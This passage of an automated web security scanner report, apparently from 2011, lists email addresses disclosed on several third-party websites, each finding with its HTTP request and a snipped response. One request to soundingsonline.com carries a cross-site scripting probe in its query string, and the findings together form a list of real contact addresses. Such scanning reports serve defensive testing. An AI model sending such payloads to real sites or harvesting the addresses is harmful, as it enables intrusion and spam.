<BODY><H1>Adcomplain Home Page</H1>

Adcomplain is a tool for reporting inappropriate commercial e-mail and
usenet postings, as well as chain letters an
...[SNIP]...
<a href="mailto:billmc@agora.rdrop.com" ><billmc@agora.rdrop.com> </a>
...[SNIP]...

24.371. http://www.rochenhost.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rochenhost.com
Path:	/

Issue detail

The following email addresses were disclosed in the response:

sales@rochen.com
sales@workgroup.im.rochen.com

Request

GET / HTTP/1.1
Host: www.rochenhost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.372. http://www.rochenhost.com/joomla-hosting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rochenhost.com
Path:	/joomla-hosting

Issue detail

The following email addresses were disclosed in the response:

sales@rochen.com
sales@workgroup.im.rochen.com

Request

GET /joomla-hosting HTTP/1.1
Host: www.rochenhost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.373. http://www.rvtraderonline.com/research/resources/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rvtraderonline.com
Path:	/research/resources/

Issue detail

The following email address was disclosed in the response:

keyacctleads@rvtraderonline.com

Request

GET /research/resources/ HTTP/1.1
Host: www.rvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.374. http://www.saddi.com/software/newsfish/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.saddi.com
Path:	/software/newsfish/

Issue detail

The following email address was disclosed in the response:

allan@saddi.com

Request

GET /software/newsfish/ HTTP/1.1
Host: www.saddi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:08 GMT
Server: Apache/2.2
Last-Modified: Tue, 24 May 2005 23:19:21 GMT
ETag: "9a8b58-10e3-3f7e26b0fd040"
Accept-Ranges: bytes
Content-Length: 4323
Connection: close
Content-Type: text/html

<html>

<head>
<title>newsfish Page</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"><!--
body {
color: black;
background-color: white;
f
...[SNIP]...
<a href="mailto:allan@saddi.com">
...[SNIP]...

24.375. http://www.safepeak.com/downloadtrial/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.safepeak.com
Path:	/downloadtrial/

Issue detail

The following email addresses were disclosed in the response:

info@safepeak.com
sales@safepeak.com

Request

GET /downloadtrial/ HTTP/1.1
Host: www.safepeak.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=0ivcyr551tjfgm55s04oq255; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 02:28:40 GMT
Connection: close
Content-Length: 29620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
SafePeak.com |
...[SNIP]...
<a class="darkGray" href="mailto:info@safepeak.com">info@safepeak.com</a>, <a class="darkGray"
href="mailto:info@safepeak.com">sales@safepeak.com</a>
...[SNIP]...

24.376. http://www.sailinganarchy.com/advertise.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/advertise.htm

Issue detail

The following email address was disclosed in the response:

scot@sailinganarchy.com

Request

GET /advertise.htm HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:41 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 21:56:20 GMT
ETag: "21dc76-3008-6c654900"
Accept-Ranges: bytes
Content-Length: 12296
Vary: User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="business" value="scot@sailinganarchy.com" />
...[SNIP]...

24.377. http://www.sailinganarchy.com/breymaiersailing.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/breymaiersailing.com

Issue detail

The following email address was disclosed in the response:

webmaster@sailinganarchy.com

Request

GET /breymaiersailing.com HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:28:42 GMT
Server: Apache
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 1984

<html>
<head>
<title>NetHere: URL Not Found (404)</title>
<link rev="made" href="mailto:webmaster@sailinganarchy.com">
<style>
a:link {
color : #092769;
}
a:visited {
color : #092769;

...[SNIP]...
<a href="mailto:webmaster@sailinganarchy.com">webmaster@sailinganarchy.com</a>
...[SNIP]...

24.378. http://www.sailinganarchy.com/calendar/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/calendar/index.php

Issue detail

The following email addresses were disclosed in the response:

support@yachtscoring.com
www.stcroixyc@gmail.com

Request

GET /calendar/index.php HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.379. http://www.sailinganarchy.com/editor/audio_video.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/editor/audio_video.php

Issue detail

The following email address was disclosed in the response:

editor@sailinganarchy.com

Request

GET /editor/audio_video.php HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:43 GMT
Server: Apache
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 122549

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Sailin News and
...[SNIP]...
<a href="mailto:editor@sailinganarchy.com">
...[SNIP]...

24.380. http://www.sailinganarchy.com/editor/pimpin.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/editor/pimpin.php

Issue detail

The following email addresses were disclosed in the response:

bill@farryachtsales.com
btomkies@regatta-manager.com
editor@sailinganarchy.com
info@BicSportNA.com
krista@trippdesign.net
sales@cstcomposites.com

Request

GET /editor/pimpin.php HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:44 GMT
Server: Apache
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 70163

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Sailin News and
...[SNIP]...
<a href="mailto:btomkies@regatta-manager.com">
...[SNIP]...
<a href="mailto:info@BicSportNA.com">info@BicSportNA.com</a>
...[SNIP]...
<a href="mailto:editor@sailinganarchy.com">
...[SNIP]...
<a href="mailto:krista@trippdesign.net">
...[SNIP]...
<a href="mailto:sales@cstcomposites.com">sales@cstcomposites.com</a>
...[SNIP]...
<a href="mailto:bill@farryachtsales.com">
...[SNIP]...

24.381. http://www.sailinganarchy.com/index_page1.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/index_page1.php

Issue detail

The following email address was disclosed in the response:

editor@sailinganarchy.com

Request

GET /index_page1.php HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.382. http://www.sailinganarchy.com/index_page2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/index_page2.php

Issue detail

The following email address was disclosed in the response:

markracine@gmail.com

Request

GET /index_page2.php HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.383. http://www.sailinganarchy.com/java/ad_rotation.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/java/ad_rotation.js

Issue detail

The following email address was disclosed in the response:

webmaster@EchoChrist.com

Request

GET /java/ad_rotation.js HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:47 GMT
Server: Apache
Last-Modified: Thu, 20 Jan 2011 16:33:10 GMT
ETag: "33467e-119f-b06bfd80"
Accept-Ranges: bytes
Content-Length: 4511
Vary: User-Agent
Connection: close
Content-Type: application/x-javascript

// Java Document
///////////////////////////////////////////////////////////
/// Magic Image Rotation ///
/// v 1.0.1 ///
/// Copyright 2007, Loyce Bradley Petrey ///
/// All Rights Reserved. ///
/// http://www.EchoChrist.com/MagicImage ///
/// webmaster@EchoChrist.com ///
/// ///
/// This script is free to use as long as this notice ///
/// remains unchanged and intact. ///
/// ///
/// This program is free software: you can redistribute ///
/// it and/or modify it
...[SNIP]...

24.384. http://www.sailinganarchy.com/none previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/none

Issue detail

The following email address was disclosed in the response:

webmaster@sailinganarchy.com

Request

GET /none HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:28:46 GMT
Server: Apache
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 1984

<html>
<head>
<title>NetHere: URL Not Found (404)</title>
<link rev="made" href="mailto:webmaster@sailinganarchy.com">
<style>
a:link {
color : #092769;
}
a:visited {
color : #092769;

...[SNIP]...
<a href="mailto:webmaster@sailinganarchy.com">webmaster@sailinganarchy.com</a>
...[SNIP]...

24.385. http://www.sailinganarchy.com/terms.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/terms.htm

Issue detail

The following email addresses were disclosed in the response:

ed@sailinganarchy.com
info@sailinganarchy.com

Request

GET /terms.htm HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:48 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 03:53:05 GMT
ETag: "21dc74-5410-a0df6a40"
Accept-Ranges: bytes
Content-Length: 21520
Vary: User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
notices from the materials. If you believe any content appearing on our website constitutes a copyright or trademark infringement of another parties’ rights, please contact us immediately at [info@sailinganarchy.com] to notify us.</font>
...[SNIP]...
r proprietary notices from the materials. If you believe any content appearing on our website constitutes a copyright infringement of another parties’ rights, please contact us immediately at ed@sailinganarchy.com to notify us of this infringement.</font>
...[SNIP]...

24.386. http://www.snowmobiletraderonline.com/sell/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.snowmobiletraderonline.com
Path:	/sell/

Issue detail

The following email address was disclosed in the response:

customerservice@cycletrader.com

Request

GET /sell/ HTTP/1.1
Host: www.snowmobiletraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.387. http://www.soundingsonline.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

GET / HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.388. http://www.soundingsonline.com/about-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/about-us

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:35:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:35:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.389. http://www.soundingsonline.com/advertise previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/advertise

Issue detail

The following email addresses were disclosed in the response:

amber@soundingspub.com
c.francis@soundingspub.com
e.cirillo@soundingspub.com
f.lavigne@soundingspub.com
info@soundingspub.com
m.boyles@soundingspub.com
ryanvincent@soundingspub.com
tmarion@soundingspub.com
w.connor@soundingspub.com
wayne@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:30:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:30:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:tmarion@soundingspub.com">tmarion@soundingspub.com</a>
...[SNIP]...
<a href="mailto:f.lavigne@soundingspub.com">f.lavigne@soundingspub.com</a>
...[SNIP]...
<a href="mailto:ryanvincent@soundingspub.com">ryanvincent@soundingspub.com</a>
...[SNIP]...
<a href="mailto:wayne@soundingspub.com">wayne@soundingspub.com</a>
...[SNIP]...
<a href="mailto:amber@soundingspub.com">amber@soundingspub.com</a>
...[SNIP]...
<a href="mailto:w.connor@soundingspub.com">w.connor@soundingspub.com</a>
...[SNIP]...
<a href="mailto:m.boyles@soundingspub.com">m.boyles@soundingspub.com</a>
...[SNIP]...
<a href="mailto:c.francis@soundingspub.com">c.francis@soundingspub.com</a>
...[SNIP]...
<a href="mailto:amber@soundingspub.com">amber@soundingspub.com</a>
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.390. http://www.soundingsonline.com/archives previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/archives

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

GET /archives?'"--></style></script><script>alert(0x001E2B)</script> HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

24.391. http://www.soundingsonline.com/boat-shop previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.392. http://www.soundingsonline.com/boat-shop/know-how previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/know-how

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.393. http://www.soundingsonline.com/boat-shop/new-boats previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/new-boats

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.394. http://www.soundingsonline.com/boat-shop/new-gear previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/new-gear

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.395. http://www.soundingsonline.com/boat-shop/on-powerboats previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/on-powerboats

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.396. http://www.soundingsonline.com/boat-shop/on-sailboats previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/on-sailboats

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.397. http://www.soundingsonline.com/boat-shop/q-a-a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/q-a-a

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.398. http://www.soundingsonline.com/boat-shop/sea-savvy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/sea-savvy

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.399. http://www.soundingsonline.com/boat-shop/tech-talk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/tech-talk

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.400. http://www.soundingsonline.com/boat-shop/used-boat-review previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/used-boat-review

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:31:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:31:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

24.401. http://www.soundingsonline.com/calendar previous next

Summary

